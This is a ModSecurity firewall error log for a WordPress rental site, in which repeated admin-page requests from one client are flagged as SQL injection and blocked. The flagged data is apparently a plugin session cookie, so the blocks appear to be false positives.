[Mon May 11 18:31:59.999438 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEfzJnyuKVXoStDhbiFwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:31:59.999724 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEfzJnyuKVXoStDhbiFwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:00.606208 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEfzJnyuKVXoStDhbiFwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:00.919087 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEgDJnyuKVXoStDhbiGQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:00.919483 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEgDJnyuKVXoStDhbiGQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:01.474200 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEgDJnyuKVXoStDhbiGQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:01.615227 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEgTJnyuKVXoStDhbiGgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:01.615509 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEgTJnyuKVXoStDhbiGgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:02.179701 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEgTJnyuKVXoStDhbiGgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:02.321672 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEgjJnyuKVXoStDhbiHAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:02.321980 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEgjJnyuKVXoStDhbiHAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:02.689463 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEgjJnyuKVXoStDhbiHAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:02.961191 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEgjJnyuKVXoStDhbiHQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:02.961469 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEgjJnyuKVXoStDhbiHQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:03.589820 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEgjJnyuKVXoStDhbiHQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:03.830102 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEgzJnyuKVXoStDhbiHwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:03.830400 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEgzJnyuKVXoStDhbiHwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:04.438228 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEgzJnyuKVXoStDhbiHwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:04.721051 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEhDJnyuKVXoStDhbiIQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:04.721331 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEhDJnyuKVXoStDhbiIQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:05.356662 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEhDJnyuKVXoStDhbiIQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:05.676632 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEhTJnyuKVXoStDhbiJgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:05.676900 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEhTJnyuKVXoStDhbiJgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:06.241374 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEhTJnyuKVXoStDhbiJgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:06.341602 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEhjJnyuKVXoStDhbiKwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:06.341887 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEhjJnyuKVXoStDhbiKwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:06.959038 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEhjJnyuKVXoStDhbiKwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:07.068364 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEhzJnyuKVXoStDhbiLAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:07.068775 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEhzJnyuKVXoStDhbiLAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:07.483556 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEhzJnyuKVXoStDhbiLAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:07.701517 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEhzJnyuKVXoStDhbiLgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:07.701812 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEhzJnyuKVXoStDhbiLgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:08.361623 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEhzJnyuKVXoStDhbiLgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:08.679908 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEiDJnyuKVXoStDhbiLwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:08.680210 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEiDJnyuKVXoStDhbiLwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:09.300326 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEiDJnyuKVXoStDhbiLwAAAFM"], referer: https://rentparadise.fr/wp-login.php
